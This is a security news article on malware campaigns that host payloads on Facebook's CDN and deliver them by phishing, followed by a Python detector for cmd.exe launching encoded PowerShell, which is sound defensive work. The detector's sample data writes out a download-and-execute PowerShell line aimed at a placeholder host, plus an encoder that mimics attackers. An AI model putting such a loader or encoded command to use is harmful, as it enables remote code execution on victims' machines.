A group of hackers was able to use Facebook CDN (Content Delivery Network) servers to distribute malware and evade detection.
“A content delivery network or content distribution network (CDN) is a geographically distributed network of proxy servers and their data centers. The goal is to distribute service spatially relative to end-users to provide high availability and high performance. CDNs serve a large portion of the Internet content today, including web objects (text, graphics and scripts), downloadable objects (media files, software, documents), applications (e-commerce, portals), live streaming media, on-demand streaming media, and social networks.”
Security researchers from MalwareHunterTeam discovered several campaigns over the last two weeks that leverage Facebook CDN (Content Delivery Network) servers to bypass security solutions. Earlier, the same malware group used Dropbox and Google’s cloud storage services to host the same payloads.
The distribution process begins with the victims receiving a fake email from the attackers. The emails pose as official communications from local authorities and contain a link.
The links point to Facebook’s CDN (Content Delivery Network). The attackers use it because security solutions trust the domain and do not block traffic to it, so the links reach the victims. The group uploads the files to Facebook (for example in groups or other sections of the site), copies each file’s CDN URL, and sends that URL to the victims.
The link looks something like this:
When the victim clicks the link, a compressed archive is downloaded. It contains a shortcut file; once the shortcut is executed, it invokes a legitimate application present on most Windows PCs, the Command Prompt (cmd.exe), which in turn runs an encoded PowerShell script.
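The chain described above (shortcut, cmd.exe, then PowerShell with a base64-encoded command) leaves a recognisable trace in process-creation telemetry. The following Python script is an added example written for this page, not code from the article or from the researchers: it encodes a command the way powershell.exe -EncodedCommand expects (base64 over UTF-16LE), decodes such blobs back out of command lines, and flags PowerShell processes spawned by cmd.exe with an encoded payload. The sample events and the http://example.invalid URL are constructed for the demonstration; the field names (parent_image, image, command_line) are assumptions standing in for whatever your EDR or Sysmon pipeline emits.

```python
"""Detect cmd.exe -> powershell.exe -EncodedCommand chains in process-creation events.

Added example for this article; the telemetry below is constructed, not real logs.
"""
import base64
import re
from typing import List, Optional

# powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...).
# "-e" followed by "x" is excluded so -ExecutionPolicy / -Exec do not match.
ENCODED_ARG = re.compile(r"(?i)(?:^|\s)[-/]e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]+)")
POWERSHELL = re.compile(r"(?i)\b(?:powershell|pwsh)(?:\.exe)?\b")
DOWNLOADER = re.compile(r"(?i)downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient")


def encode_powershell(script: str) -> str:
    """Encode a script exactly as an attacker does for -EncodedCommand: base64 of UTF-16LE."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(blob: str) -> Optional[str]:
    """Reverse encode_powershell; return None if the blob is not valid UTF-16LE base64."""
    try:
        raw = base64.b64decode(blob, validate=True)
        if len(raw) % 2:  # UTF-16 needs an even number of bytes
            return None
        return raw.decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError subclass
        return None


def analyze_event(event: dict) -> Optional[dict]:
    """Return a finding for a PowerShell process carrying an encoded command, else None."""
    cmdline = event["command_line"]
    if not POWERSHELL.search(cmdline):
        return None
    match = ENCODED_ARG.search(cmdline)
    if not match:
        return None
    decoded = decode_encoded_command(match.group(1))
    return {
        "parent": event["parent_image"],
        "image": event["image"],
        # the article's chain: the shortcut runs cmd.exe, which launches PowerShell
        "via_cmd": event["parent_image"].lower().endswith("cmd.exe"),
        "decoded": decoded,
        "downloads": bool(decoded and DOWNLOADER.search(decoded)),
    }


def scan(events: List[dict]) -> List[dict]:
    """Run analyze_event over a batch of events and keep only the findings."""
    return [f for f in (analyze_event(e) for e in events) if f]


# Constructed stage-2 loader and sample telemetry (placeholder URL, not from the article).
STAGE2 = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2.ps1')"
SAMPLE_EVENTS = [
    # the chain from the article: shortcut -> cmd.exe -> powershell.exe -enc <base64>
    {"parent_image": "cmd.exe", "image": "powershell.exe",
     "command_line": "powershell.exe -NoP -W Hidden -enc " + encode_powershell(STAGE2)},
    # benign, unencoded PowerShell launched from the desktop
    {"parent_image": "explorer.exe", "image": "powershell.exe",
     "command_line": "powershell.exe -ExecutionPolicy Bypass -File C:\\Scripts\\backup.ps1"},
    # unrelated process
    {"parent_image": "services.exe", "image": "svchost.exe", "command_line": "svchost.exe -k netsvcs"},
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding)
```

The decode step matters more than the match itself: an encoded command that expands to a download-and-execute one-liner is the signal to pivot on, and the decoded URL is what you would then hunt for in proxy logs, which is exactly where a trusted CDN domain would otherwise have slipped past a block list.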